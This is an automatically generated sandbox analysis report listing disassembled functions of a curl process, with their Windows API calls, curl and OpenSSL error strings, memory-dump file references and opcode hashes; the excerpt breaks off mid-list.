                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c$..\..\openssl\openssl\crypto\rand\md_rand.c
                                                                                                                                                                    • API String ID: 0-283015414
                                                                                                                                                                    • Opcode ID: 79fc770ec62bf75e993b5ddc0cbcac9f325c9f41a4513fc2f90933b2a68de9e1
                                                                                                                                                                    • Instruction ID: 9fd0b299fdc059ee59db4b10f66991a3e30b8b9719d1ea5d3d820bdeb1912c41
                                                                                                                                                                    • Opcode Fuzzy Hash: 79fc770ec62bf75e993b5ddc0cbcac9f325c9f41a4513fc2f90933b2a68de9e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 12412B78751307BBE326DF14DC6DB6673ACDB08B00F14C61DE9496B2D1DBF098618691
                                                                                                                                                                    Function 0020AC40 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 267COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • GSSAPI handshake failure (empty security message), xrefs: 0020AD8F
                                                                                                                                                                    • GSSAPI handshake failure (invalid security data), xrefs: 0020ADB0
                                                                                                                                                                    • GSSAPI handshake failure (invalid security layer), xrefs: 0020ADE0
                                                                                                                                                                    • GSSAPI handshake failure (empty security message), xrefs: 0020AFF4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                                                    • API String ID: 0-2965908308
                                                                                                                                                                    • Opcode ID: 4c16646cf4e5e671b40d3aa78f601abd1242a585a40d4c2087535ae41af3f9eb
                                                                                                                                                                    • Instruction ID: 36d8cfe4ac87e88ea8f21f19dc23e94ab63b8c8daa28bbceffd86cb9f1319b72
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c16646cf4e5e671b40d3aa78f601abd1242a585a40d4c2087535ae41af3f9eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 20B19DB15083418FD721DF28D845B5BBBE8BF88304F04882DF98987262D776E959CB93
                                                                                                                                                                    Function 002B1B70 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getsockopt.WS2_32(00000000,0000FFFF,00001007,?,00000000), ref: 002B1BCB
                                                                                                                                                                    • ioctlsocket.WS2_32(?,8004667E,00000004), ref: 002B1C04
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getsockoptioctlsocket
                                                                                                                                                                    • String ID: L86$SSH-$auth$ssh-userauth
                                                                                                                                                                    • API String ID: 1030330279-1027386589
                                                                                                                                                                    • Opcode ID: 78da8cac1b8da91a7f07d4aa656215e83e5f833ea2965f5b182169a410331468
                                                                                                                                                                    • Instruction ID: eeb338a5e149077d2f923e80c4c90ae0d001e026034f5ecab16143bf9cae0ed0
                                                                                                                                                                    • Opcode Fuzzy Hash: 78da8cac1b8da91a7f07d4aa656215e83e5f833ea2965f5b182169a410331468
                                                                                                                                                                    • Instruction Fuzzy Hash: 73710AB45107018BE730CF34DC967D7BBE4EF45365F40462EE8AE82280E375A668CB91
                                                                                                                                                                    Function 001DC830 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: User-Agent: %s
                                                                                                                                                                    • API String ID: 1927824332-43864714
                                                                                                                                                                    • Opcode ID: 73f2963a47edcd2c5d610e0817c29f2516387d4d4fe8abb300660efad0181f16
                                                                                                                                                                    • Instruction ID: 6f3c506e7825fbaf6f037afb867aa89ab0e283dacd613a3183b643e535e591b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 73f2963a47edcd2c5d610e0817c29f2516387d4d4fe8abb300660efad0181f16
                                                                                                                                                                    • Instruction Fuzzy Hash: 0151C232B406416BEB196B38DD4ABBEBB59EB52712F04037FF90C9E2D1DB71591087A0
                                                                                                                                                                    Function 001FBDE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • getsockname.WS2_32(?,?,00000080), ref: 001FBE18
                                                                                                                                                                    • accept.WS2_32(?,?,00000080), ref: 001FBE35
                                                                                                                                                                    • closesocket.WS2_32(?), ref: 001FBE66
                                                                                                                                                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 001FBEB8
                                                                                                                                                                      • Part of subcall function 001DE530: closesocket.WS2_32(?), ref: 001DE55C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Connection accepted from server, xrefs: 001FBE91
                                                                                                                                                                    • Error accept()ing server connect, xrefs: 001FBE71
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: closesocket$acceptgetsocknameioctlsocket
                                                                                                                                                                    • String ID: Connection accepted from server$Error accept()ing server connect
                                                                                                                                                                    • API String ID: 3840160814-2331703088
                                                                                                                                                                    • Opcode ID: 88562fdbafe55e8d6a9d505f9850626b200f6a31b7d61cd46c5154e1a9afd2d0
                                                                                                                                                                    • Instruction ID: fb07f14cbe875d03e3be7f1f46190f8ea456a6da1ba2ff44e7c65905aef0c0a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 88562fdbafe55e8d6a9d505f9850626b200f6a31b7d61cd46c5154e1a9afd2d0
                                                                                                                                                                    • Instruction Fuzzy Hash: D731B7706087459BD720DF34DC84FEBB7DDAB80310F00491AF9A692282DB75E9498762
                                                                                                                                                                    Function 001CD580 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,001CD759), ref: 001CD587
                                                                                                                                                                    Strings
                                                                                                                                                                    • The directory name %s is too long., xrefs: 001CD60A
                                                                                                                                                                    • No space left on the file system that will contain the directory %s., xrefs: 001CD59F
                                                                                                                                                                    • You don't have permission to create %s., xrefs: 001CD5B2
                                                                                                                                                                    • Error creating directory %s., xrefs: 001CD5E4
                                                                                                                                                                    • %s resides on a read-only file system., xrefs: 001CD5C5
                                                                                                                                                                    • Cannot create directory %s because you exceeded your quota., xrefs: 001CD5F7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: %s resides on a read-only file system.$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                                                                                                                                                    • API String ID: 1452528299-798752981
                                                                                                                                                                    • Opcode ID: 560b32ca4a8323e5a53b4964a4e0e2d8c960b5d59e5abccdd8bd8f769f675b27
                                                                                                                                                                    • Instruction ID: 434537500e84646f374b019363757d6a672eacd19f511a10addf5e901d645a89
                                                                                                                                                                    • Opcode Fuzzy Hash: 560b32ca4a8323e5a53b4964a4e0e2d8c960b5d59e5abccdd8bd8f769f675b27
                                                                                                                                                                    • Instruction Fuzzy Hash: C2014FABB4112021C42D250E7C4AEEF5B29C8F67F7724097FF50AD05A2AB84C5D6F1B2
                                                                                                                                                                    Function 001CBA00 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(CURL_HOME,00000400,00000400), ref: 001CBA23
                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(HOME,00000400,00000400), ref: 001CBA56
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                    • String ID: %USERPROFILE%\Application Data$APPDATA$CURL_HOME$HOME
                                                                                                                                                                    • API String ID: 1431749950-734137483
                                                                                                                                                                    • Opcode ID: 27ff6f6e94c45c8f5c4640ce19ede00c0c3d1b6118efcf1311ab8d83a4d4e66b
                                                                                                                                                                    • Instruction ID: 8047a5de930f49a9c6e7b362c2b77120618795a41d5d7ba51ab79715333276d3
                                                                                                                                                                    • Opcode Fuzzy Hash: 27ff6f6e94c45c8f5c4640ce19ede00c0c3d1b6118efcf1311ab8d83a4d4e66b
                                                                                                                                                                    • Instruction Fuzzy Hash: 750192E0A0C2415AE729B764D9C7FAEB28DDF68704F44082EE7C5C6191E778D9848A53
                                                                                                                                                                    Function 002C35EE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002C36B7,?), ref: 002C3608
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002C360F
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002C361B
                                                                                                                                                                    • DecodePointer.KERNEL32(00000001,002C36B7,?), ref: 002C3638
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                                                    • Opcode ID: d3f959c1520e77901855a2c867698c5dbd70080e1719e0020e4fcb85c58371ab
                                                                                                                                                                    • Instruction ID: 95493b8bfb00c5b5a086576afd0d1adc7217b6c5cd5b1e5eff2be7bc397d7389
                                                                                                                                                                    • Opcode Fuzzy Hash: d3f959c1520e77901855a2c867698c5dbd70080e1719e0020e4fcb85c58371ab
                                                                                                                                                                    • Instruction Fuzzy Hash: 16E092709A6B01AADB105F78FC4DB907A59A750717F509455F001D11F0D7F04845CA58
                                                                                                                                                                    Function 002C36C3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002C35DD), ref: 002C36DD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002C36E4
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002C36EF
                                                                                                                                                                    • DecodePointer.KERNEL32(002C35DD), ref: 002C370A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
